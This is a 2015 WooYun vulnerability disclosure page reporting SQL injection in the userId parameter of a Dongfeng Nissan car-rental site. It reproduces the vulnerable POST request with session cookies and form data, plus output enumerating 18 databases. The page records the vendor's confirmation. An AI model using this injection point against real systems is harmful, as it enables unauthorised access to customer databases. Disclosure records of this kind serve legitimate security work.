当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0131796

漏洞标题:东风日产旗下易租车SQL注入(涉及18库)

相关厂商:东风日产乘用车公司

漏洞作者: 路人甲

提交时间:2015-08-05 12:28

修复时间:2015-09-19 14:36

公开时间:2015-09-19 14:36

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-08-05: 细节已通知厂商并且等待厂商处理中
2015-08-05: 厂商已经确认,细节仅向厂商公开
2015-08-15: 细节向核心白帽子及相关领域专家公开
2015-08-25: 细节向普通白帽子公开
2015-09-04: 细节向实习白帽子公开
2015-09-19: 细节向公众公开

简要描述:

是不是也要给2rank啊

详细说明:

注入点 

X-Requested-With: XMLHttpRequest
Referer: http://www.ezucoo.com/myezccenter/PersonalInformationShow/PersonalInformationUpdate
Content-Length: 522
Cookie: SC_ANALYTICS_GLOBAL_COOKIE=50a7f11efa0c490cbebcafaef8e49d5c; _smt_uid=55c097ce.6771fdc; looyu_id=f0d025f1a18a229d6b2ae423db8844b43d_50895%3A2; ASP.NET_SessionId=el0l0yfihvxjx540smj11m0y; SC_ANALYTICS_SESSION_COOKIE=29880DDE9A4243E8BC6FE5E484D5230E|1|el0l0yfihvxjx540smj11m0y; CityNoByIP=20004; CityNameByIP=%e9%87%8d%e5%ba%86%e5%b8%82; CityCodeByWeatherByIP=%e9%87%8d%e5%ba%86; CityNo=20004; CityName=%e9%87%8d%e5%ba%86%e5%b8%82; CityCodeByWeather=%e9%87%8d%e5%ba%86; ARRAffinity=be7d041a2b2e40f21bc21cc1815e26d880f6cf2bbb0becab844d3af94f2c6321; npasslogin=0; looyu_50895=v%3Acea5bab21b5574bbde081b8a24816eb1ad%2Cref%3A%2Cr%3A%2Cmon%3Ahttp%3A//m153.looyu.com/monitor
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
method=SaveEditPersonalInfo&userId=168165&username=13750000001&phone=13750000001&birthday=2015-07-31&education=4&qq=1651651&msn=&tel=&address=fasdfsdf&zipcode=&driverdate=&driverindate=&driverlisener=&provinceno=6&cityno=&email=&countyno=&carmodel=&carnum=&unitname=&unittelarea=&unittel=&faxarea=&fax=&position=ghs&seniority=&unitaddress=%E9%A3%9E%E5%BE%97%E6%9B%B4%E5%BF%AB%E4%BA%86%E5%9D%9A%E5%AE%9E%E7%9A%84%E6%B3%95%E8%A7%84&unitzipcode=&isnaddress=422003&naddress=%E4%B8%8A%E5%AE%98%E5%A9%89%E5%84%BF&mailingzipcode=


userid参数
注入过程

m1.png

漏洞证明:

数据库
available databases [18]:
[*] DBA_Audit
[*] DFL2Extend
[*] DFL_EZC
[*] DFLACTIVITY
[*] DFLACTIVITY_NEW
[*] DFLBackground
[*] DFLLoginLog
[*] DFLSitecore_Core
[*] DFLSitecore_Extend
[*] DFLSitecore_Web
[*] DFLWebService
[*] master
[*] model
[*] msdb
[*] Npass
[*] Sitecore_analytics
[*] SMS
[*] tempdb

修复方案:

。。。。。。。。。。。。。

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2015-08-05 14:34

厂商回复:

感谢提醒,我们会尽快修复漏洞。

最新状态:

暂无

漏洞评价:

评论

  1. 2015-08-05 12:32 | 牛 小 帅 ( 普通白帽子 | Rank:363 漏洞数:75 | [code]心若没有栖息的地方,走到哪里都是在...)

    刚上来准备提交漏洞。。。。。擦 你提交啦。。。。。我刚跑出。。。。。。。。。。